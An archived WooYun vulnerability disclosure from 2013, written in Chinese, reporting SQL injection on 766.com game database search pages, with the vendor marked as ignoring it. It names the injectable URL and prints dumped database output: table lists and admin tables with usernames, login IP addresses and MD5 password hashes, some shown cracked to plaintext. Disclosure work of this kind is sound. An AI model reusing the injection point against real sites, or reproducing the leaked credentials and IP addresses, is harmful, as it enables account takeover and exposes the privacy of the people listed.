乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-08-29: 细节已通知厂商并且等待厂商处理中 2013-09-03: 厂商已经主动忽略漏洞,细节向公众公开
你懂得最基本的sql注入
大部分db查询都使用的一套系统注入点就是http://at.db.766.com/search.php?search.php?action=8&start=16&end=30&gwpage=3#gw还有其他使用同样系统的,梦幻西游啊,什么什么什么的,基本上就是年久失修的网站
+-----+---------+---------------+----------+-------------------------------------------+------------+--------------+| uid | adminid | lastip | username | password | updateuser | lastactivity |+-----+---------+---------------+----------+-------------------------------------------+------------+--------------+| 1 | 1 | 117.84.151.95 | dragon | 8621ffdbc5698829397d97767ac13db3 (dragon) | <blank> | 1319755592 || 2 | 1 | 218.66.36.119 | 上天入地 | e10adc3949ba59abbe56e057f20f883e (123456) | <blank> | 1245824876 || 3 | 1 | 117.84.151.95 | bayon3t | 326cbac35cb3b880ecd5ff67dcd276aa (banker) | <blank> | 1319755703 || 4 | 1 | 218.66.36.119 | keepnet | 6cc1c40f6caa5f92897e4241a31b8991 | <blank> | 1307431737 || 5 | 3 | 218.66.57.81 | 766com | 5b711ebff2c42e3cfac6e3ec63781d3e | <blank> | 1361329083 |+-----+---------+---------------+----------+-------------------------------------------+------------+--------------+
[22 tables]+-----------------+| x_admins || x_adminsessions || x_at_charaters || x_at_datas || x_at_types || x_attachtypes || x_codes || x_failedlogins || x_gws || x_keywords || x_maps || x_npcs || x_occs || x_rws || x_settings || x_skills || x_styles || x_stylevars || x_templates || x_wps || x_yblevs || x_ybs |+-----------------+
Database: db_mhxyTable: m_admins[13 entries]+---------+--------------+---------------+----------------------------------+-----+------------+| adminid | lastactivity | lastip | password | uid | username |+---------+--------------+---------------+----------------------------------+-----+------------+| 1 | 1310372668 | 120.35.10.225 | 3694e44a7669c4986424bfbb8897cfdf | 13 | xiaomo || 1 | 1310375919 | 120.35.10.225 | 348f10f863b27ec106195c96e23dcd91 | 12 | xiaoyu || 1 | 1301646109 | 218.66.36.119 | 1bed827ff753e81958090540dced95af | 11 | xiu || 1 | 1301475208 | 120.35.10.225 | 3dc5f2a5448ea681ad7ec5a59ca11f2e | 10 | xiangxiang || 1 | 1301476079 | 120.35.10.225 | 242bfc1fb44b238986ab168d3610b771 | 9 | yingzi || 1 | 1310630815 | 218.66.36.119 | df1bfa7d7bd66664564262fe4dbc8bcc | 8 | daodao || 1 | 1301449543 | 120.35.10.225 | afe1b6a9a0055f31096ffd2c8b8066e1 | 7 | dilei || 1 | 1301364743 | 120.35.10.225 | a3fbf203ed16a936a471b674f09846da | 6 | junfeng || 1 | 1301645302 | 120.35.10.225 | 688f227b9cad4edeed15f067e04d3764 | 5 | lei || 1 | 1300675347 | 120.35.10.225 | f4fe292eb01627a0219872d44a305ec5 | 4 | x5 || 1 | 1305005162 | 218.66.36.119 | ff89cc66529a8e4aa81bac2a86fa51be | 3 | vincentkid || 1 | 1302689813 | 218.66.36.119 | 73f50c9f17291ce93ee52e50b73f6f63 | 2 | lan || 1 | 1317088177 | 218.66.36.119 | e10adc3949ba59abbe56e057f20f883e | 1 | admin |+---------+--------------+---------------+----------------------------------+-----+------------+
该删的删,该补的补
危害等级:无影响厂商忽略
忽略时间:2013-09-03 18:55
暂无